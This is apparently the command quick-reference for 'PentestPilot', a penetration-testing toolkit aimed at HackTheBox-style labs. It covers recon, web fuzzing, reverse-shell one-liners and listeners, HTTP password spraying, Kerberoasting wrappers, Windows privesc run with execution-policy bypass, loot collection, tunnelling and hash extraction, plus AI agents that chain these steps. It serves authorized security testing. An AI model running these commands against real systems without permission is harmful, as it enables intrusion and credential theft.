PentestPilot/TOOLKIT.md
0xMarcio 1ec50d14a3 docs: remove em dashes; convert pseudo-links to real Markdown links; improve formatting
- Replace all em dashes with simple hyphens across repo
- README: real links in Docs Index, badges and headings
- HOWTO: clickable TOC, clean headings, hyphen usage
- TOOLKIT: clickable TOC, cleaned bullets, crosslinks and examples
- Dashboard and pack_report strings updated to avoid em dashes
- .zshrc comment cleaned
2025-10-08 16:11:24 +02:00
# PentestPilot - Quick Reference
For step-by-step usage, pipeline semantics, dashboard features, and resume behavior, read [HOWTO.md](HOWTO.md). This file is a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if the positional argument is omitted.
## Table of Contents
- [Setup](#setup)
- [Core Workflow](#core-workflow)
- [Enumeration](#enumeration-requires-target)
- [Automation](#automation-binautomation--see-howto-automation--orchestration-dashboard-manifest)
- [Web helpers](#web-helpers-binweb--see-howto-web-recon--routing)
- [Reverse shells](#reverse-shells-binshells)
- [File transfer](#file-transfer-bintransfer)
- [Crypto / Text](#crypto--text-bincrypto)
- [Privilege Escalation](#privilege-escalation-binprivesc)
- [Misc](#misc-binmisc)
- [AI](#ai-binai--see-howto-ai-integrations)
- [Active Directory](#active-directory-binad)
- [Passwords](#passwords-binpasswords)
- [Windows](#windows-binwindows)
- [Post-Exploitation](#post-exploitation-binpost)
- [DNS](#dns-bindns)
- [Scanning](#scanning-binscan)
- [Tunnels](#tunnels-bintunnel)
- [Pwn](#pwn-binpwn)
- [Hashes](#hashes-binhashes)
- [Tips](#tips)
## Setup
- Keep this repo in a working folder, e.g., htb/.
- Source the shell helpers from your main zshrc:
  `echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc`
- Open a new shell or run: `source .zshrc.htb`
## Core Workflow
- settarget <ip_or_host>
  - Creates targets/<target> with scans, loot, www, exploits.
  - Sets OUTDIR to the target's scans directory.
- ar → auto_recon: quick scan, optional UDP, basic web enum
- webrecon → run web_recon on detected web ports
- wideweb → wide_web_recon on a list
- notesinit → scaffold notes.md in target directory
- notesattach → append scan artifacts summary to notes
## Enumeration (requires TARGET)
- nq → Quick nmap: scripts + versions
- nf → Full TCP: -p- then service/version
- nu → UDP top 200
- smb → SMB enumeration (anon by default)
- snmp → SNMP enumeration (community defaults to public)
Individual scripts (bin/)
- nmap_quick.sh <target>
- nmap_full.sh <target> [--rate 5000]
- nmap_udp.sh <target> [--top 200]
- smb_enum.sh <ip> [user] [pass]
- ldap_enum.sh <ip> [user] [pass] - auto-detect baseDNs
- nfs_enum.sh <ip>
- ftp_enum.sh <ip>
- snmp_enum.sh <ip> [community]
## Automation (bin/automation/) (see HOWTO: [Automation & Orchestration](HOWTO.md#automation--orchestration), [Dashboard](HOWTO.md#dashboard-status--evidence), [Manifest](HOWTO.md#manifest-state--resume))
- auto_recon.sh <target> [--no-udp]
- parse_nmap_open_ports.sh <*.gnmap>
- report_summary.py <*.gnmap ...>
- web_recon.sh <target|--url <url>>
- loot_pack.sh [dir]
- wide_web_recon.sh <hosts.txt>
- notes_init.sh <target>
- notes_attach.sh <target>
- full_pipeline.sh <domain|hosts.txt> [--resume|--force]
- manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) <target> [...]
- dashboard.py [--json]
- resume_all.py - resume full pipeline across all targets
- tech_actions.py <target> [--run] - suggest/run next steps based on httpx techs
- cleanup_scans.sh [dir] [days] [--force] - prune old scan files
- proxy_toggle.sh on|off [http://host:port]
- tmux_init.sh [session] - starter tmux layout
See also in HOWTO.md:
- Automation & Orchestration
- Dashboard (Status & Evidence)
- Manifest (State & Resume)
Examples
```
# One-click pipeline (resume-aware)
full_pipeline.sh target.htb
# Agent-driven full pipeline with auto tech actions
agent full target.htb
# Dashboard
dashboard --compact
# Resume all incomplete targets
resumeall
```
## Web helpers (bin/web/) (see HOWTO: [Web Recon & Routing](HOWTO.md#web-recon--routing))
- dirbuster.sh <url> [wordlist] [exts] - ffuf directory fuzz
- vhost_ffuf.sh <base-url> <domain> [wordlist] - virtual hosts
- param_fuzz.sh <url-with-FUZZ> [wordlist] - parameter discovery
- lfi_tester.py <url-with-PLACEHOLDER> - basic LFI checks
- tech_detect.sh <url> - headers + tech hints
- http_headers.sh <url> - raw headers
- url_titles.py <url1> [url2 ...] - titles and codes
- crawl_words.py <url> [depth] - extract words for wordlists
- sqli_quick.sh <url> <param> - sqlmap wrapper
- backup_hunter.sh <base-url> [paths.txt] - find common backups/configs
- git_dumper.sh <base-url> [outdir] - mirror exposed .git and restore
- cors_tester.py <url> [origin] - test ACAO/ACAC
- methods.sh <url> - show allowed methods (OPTIONS)
- clone_site.sh <url> [outdir] - wget mirror
- tls_scan.sh <host:443> - openssl-based TLS info
- robots_grabber.sh <base-url> - show Disallow entries
- webdav_detect.sh <url> - OPTIONS + PROPFIND
- httpx_probe.sh <host|file>
- nuclei_quick.sh <url|file> [tags]
- gobuster_dir.sh <url> [wordlist] [exts] [threads]
- httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
- httpx_tech_route.py <host|file> [--tech list] [--dry-run]
- httpx_presets.sh <profile> <host|file>
- gobuster_vhost.sh <url> [wordlist] [threads]
- wpscan_quick.sh <wordpress-url>
- jenkins_quick.sh <jenkins-url>
- sonarqube_quick.sh <sonarqube-url>
- magento_quick.sh <magento-url>
- droopescan_quick.sh <url>
- joomscan_quick.sh <joomla-url>
See also in HOWTO.md:
- Web Recon & Routing
Examples
```
# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt
# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra
# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
```
## Reverse shells (bin/shells/)
- revsh.py <lhost> <lport> - prints common one-liners
- listener.sh <port> - rlwrap + nc/ncat listener
- tty_upgrade.sh - quick TTY tips
Examples
```
# Listener
listener.sh 4444
# One-liners to paste on target
revsh.py YOUR_IP 4444
# Upgrade TTY
tty_upgrade.sh
```
## File transfer (bin/transfer/)
- http_serve.sh [port] - simple Python HTTP server
- serve.py [port] - HTTP server with web upload (POST /upload)
- push_http.sh <file> <http://host:port/upload> - upload to serve.py
- dl_oneshots.sh <lhost> <port> <filename> - download one-liners
- smb_server.sh [share] [path] - impacket SMB server
Examples
```
# Simple HTTP
http_serve.sh 8000
# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload
# SMB quick share
smb_server.sh share ./loot
```
## Crypto / Text (bin/crypto/)
- encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
- jwt_show.py <jwt> - decode header/payload (no verify)
Examples
```
encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
```
## Privilege Escalation (bin/privesc/)
- linux_quick_enum.sh - basic local recon
- suid_scan.sh - list SUID/SGID
- caps_scan.sh - list file capabilities
Examples
```
linux_quick_enum.sh
caps_scan.sh
```
## Misc (bin/misc/)
- cyclic.py create <len> | offset <needle> - pattern + offset
- port_forward.sh - wrappers for ssh -L/-R/-D
- extract_urls.py <file...>
Examples
```
cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md
```
## AI (bin/ai/) (see HOWTO: [AI Integrations](HOWTO.md#ai-integrations))
- ask.py [-m model] [-s system] "prompt" | - (stdin)
- wordlist_from_context.py <target> [context-file|-]
- orchestrate_web.py <hosts.txt>
- review_findings.py <notes.md> [extra]
- commands_planner.py "goal" [context]
- agent_orchestrator.py <task> - multi-agent runner (web|notes|post|ad)
See also in HOWTO.md:
- AI Integrations
Examples
```
# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt
# Orchestrate web for a host list
orchestrate_web.py hosts.txt
# Multi-agent runner
agent web hosts.txt
```
## Active Directory (bin/ad/)
- getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
- getspns_wrapper.sh <domain/user:pass> <dc_ip>
- ldap_quick_users.sh <ip> <baseDN> [user pass]
- rpc_quick.sh <host> [user pass] - rpcclient lsa/users/groups
- kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
- cme_quick.sh <host> [user pass]
Examples
```
getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass
```
## Passwords (bin/passwords/)
- mutate_words.py word1 [word2 ...] | -
- spray_http_basic.sh <url> <users.txt> <password>
- merge_dedupe.sh <file1> [file2 ...] - dedup merged lists
- wordlist_cleanup.sh <wordlist> [min] [max]
- hash_id.sh <hash> - simple guess when hashid missing
Examples
```
mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!
```
## Windows (bin/windows/)
- privesc_quick.ps1 - run on target
- win_share_enum.ps1 -Target <host>
- find_unquoted_services.ps1 - potential service path issues
- find_path_writable.ps1 - writable PATH dirs
- windows_loot.ps1 - targeted loot collector
Examples
```
powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1
```
## Post-Exploitation (bin/post/)
- linux_loot.sh - targeted loot collector with size caps
- windows_loot.ps1 - targeted loot collector (PowerShell)
- pack_report.sh <target> - merge loot/scans into markdown report
Examples
```
LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET
```
## DNS (bin/dns/)
- zone_transfer.sh <domain> [ns]
- subenum.sh <domain>
- gobuster_dns.sh <domain> [wordlist] [threads]
Examples
```
zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100
```
## Scanning (bin/scan/)
- naabu_quick.sh <target> [flags]
- masscan_top.sh <target> [rate]
Examples
```
naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000
```
## Tunnels (bin/tunnel/)
- chisel_server.sh <port>
- chisel_client.sh <host:port> R:<lport>:<rhost>:<rport>
- autossh_socks.sh <user@host> [lport]
- socat_forward.sh -L|-R <lport> <rhost> <rport>
Examples
```
autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80
```
## Pwn (bin/pwn/)
- pwntools_template.py - starter exploit template
Examples
```
python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337
```
## Hashes (bin/hashes/)
- extract_ntlm_from_secretsdump.py <file> [out]
- john_pfx.sh <file.pfx> - john format for PFX
Examples
```
extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash
```
## Tips
- OUTDIR controls where scans are saved; set by settarget.
- Most scripts accept TARGET via env if argument omitted.
- If a tool isn't installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
- For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
- Use responsibly and only with explicit authorization.
- Dashboard flags: --no-color, --compact, --json
- Read HOWTO.md for detailed guidance and examples.